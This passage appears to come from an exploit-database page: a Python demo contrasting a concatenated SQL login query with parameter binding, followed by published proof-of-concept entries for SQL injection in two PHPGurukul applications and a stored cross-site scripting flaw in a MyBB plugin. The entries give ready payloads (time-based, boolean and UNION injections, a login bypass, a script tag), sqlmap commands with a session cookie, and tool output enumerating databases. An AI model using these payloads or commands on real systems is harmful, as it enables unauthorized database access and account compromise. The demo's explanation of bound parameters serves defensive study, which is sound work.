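The request above works because both fields are concatenated into the SQL text. This added example (not the chat room's code) reproduces the login query against an in-memory SQLite table, once with concatenation and once with bound parameters, and feeds it the exact values from the request body after URL decoding. The user row is constructed for the demo and keeps the password in clear only to keep the query short; a real application compares a password hash. The same concatenation pattern is what the time-based payloads in the other entries on this page drive.

```python
import sqlite3
from urllib.parse import parse_qs


def make_db():
    """Constructed users table with a single demo account."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, password TEXT)")
    db.execute("INSERT INTO users (username, password) VALUES ('alice', 'correct-horse')")
    return db


def login_vulnerable(db, username, password):
    """Shape of the bug in login.php: user input becomes part of the SQL text.
    The quote ends the literal, 'or 1=1' makes the WHERE clause true for every
    row, and '--' comments out the password comparison entirely."""
    sql = ("SELECT id FROM users WHERE username='" + username +
           "' AND password='" + password + "'")
    return db.execute(sql).fetchone() is not None


def login_fixed(db, username, password):
    """Bound parameters: the values are sent to the engine separately from the
    statement, so a quote inside them can never end the string literal."""
    sql = "SELECT id FROM users WHERE username=? AND password=?"
    return db.execute(sql, (username, password)).fetchone() is not None


# The body of the request above, exactly as sent.
REQUEST_BODY = "username=aa%27+or+1%3D1+--&password=%27+or+1%3D1+--"


def replay(body, login):
    """Decode a form body the way PHP's $_POST would and attempt the login."""
    form = parse_qs(body)
    return login(make_db(), form["username"][0], form["password"][0])


if __name__ == "__main__":
    print(replay(REQUEST_BODY, login_vulnerable))   # True: logged in as the first user
    print(replay(REQUEST_BODY, login_fixed))        # False
```

Note that escaping quotes is not the fix: the bypass payload in the 'uid' and 'anid' entries below is numeric and needs no quote at all, which is why parameter binding (or, for identifiers, a strict allowlist) is the only robust defence.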
-
User Management System 1.0 - 'uid' SQL Injection
# Exploit Title: User Management System 1.0 - 'uid' SQL Injection
# Google Dork: N/A
# Date: 29/1/2021
# Exploit Author: Zeyad Azima
# Vendor Homepage: https://phpgurukul.com/
# Software Link: https://phpgurukul.com/user-management-system-in-php-using-stored-procedure/
# Version: V1
# Tested on: Windows

# Identify the vulnerability

1- Go to http://localhost/admin/ and log in with your account
2- Then go to http://localhost/admin/registered-users.php
3- Click edit on any user and then add the following payload to the URL

payload: AND (SELECT 5008 FROM (SELECT(SLEEP(5)))zVHT)
url: http://localhost/ums-sp/admin/edit-user-profile.php?uid=3%20AND%20(SELECT%205008%20FROM%20(SELECT(SLEEP(5)))zVHT)

If the web server makes you wait 5 seconds then it's vulnerable

# Exploit

Now you can exploit it using sqlmap (the page sits behind the admin login, so pass the session cookie):

sqlmap -u url --cookie="cookies here" --dbs

example:

sqlmap -u http://localhost/admin/edit-user-profile.php?uid=3 --cookie="PHPSESSID=dtp3titus8giv9bpdmimi6r6f1" --dbs

(sqlmap banner omitted) {1.4.10.16#dev} http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 22:55:16 /2021-01-29/

[22:55:16] [INFO] resuming back-end DBMS 'mysql'
[22:55:16] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: uid (GET)
    Type: boolean-based blind
    Title: Boolean-based blind - Parameter replace (original value)
    Payload: uid=(SELECT (CASE WHEN (7929=7929) THEN 3 ELSE (SELECT 1849 UNION SELECT 3460) END))

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: uid=3 AND (SELECT 5008 FROM (SELECT(SLEEP(5)))zVHT)
---
[22:55:16] [INFO] the back-end DBMS is MySQL
web application technology: Apache 2.4.41, PHP 7.3.10
back-end DBMS: MySQL >= 5.0.12
[22:55:16] [INFO] fetching database names
[22:55:16] [INFO] fetching number of databases
[22:55:16] [INFO] resumed: 6
[22:55:16] [INFO] resumed: mysql
[22:55:16] [INFO] resumed: information_schema
[22:55:16] [INFO] resumed: performance_schema
[22:55:16] [INFO] resumed: sys
[22:55:16] [INFO] resumed: umspsdb
[22:55:16] [INFO] resumed: zmsdb
available databases [6]:
[*] information_schema
[*] mysql
[*] performance_schema
[*] sys
[*] umspsdb
[*] zmsdb

[22:55:16] [INFO] fetched data logged to text files under
-
Zoo Management System 1.0 - 'anid' SQL Injection
# Exploit Title: Zoo Management System 1.0 - 'anid' SQL Injection
# Google Dork: N/A
# Date: 29/1/2021
# Exploit Author: Zeyad Azima
# Vendor Homepage: https://phpgurukul.com/
# Software Link: https://phpgurukul.com/zoo-management-system-using-php-and-mysql/
# Version: V1
# Tested on: Windows

# Identify the vulnerability

1- Go to http://localhost/animals.php and click on an animal
2- Then add the following payload to the URL

payload: anid=9' AND (SELECT 8432 FROM (SELECT(SLEEP(5)))lMym) AND 'jMXh'='jMXh
url: http://localhost/animal-detail.php?anid=9%27%20AND%20(SELECT%208432%20FROM%20(SELECT(SLEEP(5)))lMym)%20AND%20%27jMXh%27=%27jMXh

If the web server makes you wait 5 seconds then it's vulnerable

# Exploit

Now you can exploit it using sqlmap (no login is needed for this page):

sqlmap -u url --dbs

example:

sqlmap -u http://localhost/zms/animal-detail.php?anid=1 --dbs

(sqlmap banner omitted) {1.4.10.16#dev} http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 23:05:33 /2021-01-29/

[23:05:34] [INFO] resuming back-end DBMS 'mysql'
[23:05:34] [INFO] testing connection to the target URL
you have not declared cookie(s), while server wants to set its own ('PHPSESSID=ban6c541hos...n856fi447q'). Do you want to use those [Y/n] y
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: anid (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: anid=9' AND 1925=1925 AND 'JrZo'='JrZo

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: anid=9' AND (SELECT 8432 FROM (SELECT(SLEEP(5)))lMym) AND 'jMXh'='jMXh

    Type: UNION query
    Title: Generic UNION query (NULL) - 8 columns
    Payload: anid=9' UNION ALL SELECT NULL,NULL,NULL,CONCAT(0x716b6b6271,0x5262686e75537a58716e565153775775796b547a4c56616b42647045536274444c6f6b585a654476,0x716a627171),NULL,NULL,NULL,NULL-- -
---
[23:05:36] [INFO] the back-end DBMS is MySQL
web application technology: Apache 2.4.41, PHP 7.3.10, PHP
back-end DBMS: MySQL >= 5.0.12
[23:05:36] [INFO] fetching database names
available databases [6]:
[*] information_schema
[*] mysql
[*] performance_schema
[*] sys
[*] umspsdb
[*] zmsdb

[23:05:36] [INFO] fetched data logged to text files under
-
MyBB Delete Account Plugin 1.4 - Cross-Site Scripting
# Exploit Title: MyBB Delete Account Plugin 1.4 - Cross-Site Scripting
# Date: 1/25/2021
# Author: 0xB9
# Twitter: @0xB9Sec
# Contact: 0xB9[at]pm.me
# Software Link: https://github.com/vintagedaddyo/MyBB_Plugin-Delete_Account/
# Version: 1.4
# Tested on: Windows 10

1. Description:
This plugin allows users to delete their own account. The reason a user gives for deleting the account is not sanitised and is vulnerable to stored XSS.

2. Proof of Concept:
- Go to User CP -> Delete Account
- Enter the following payload as the delete account reason:
<script>alert('XSS')</script>
- The payload executes when the following admin page is viewed:
admin/index.php?module=user-deleteaccount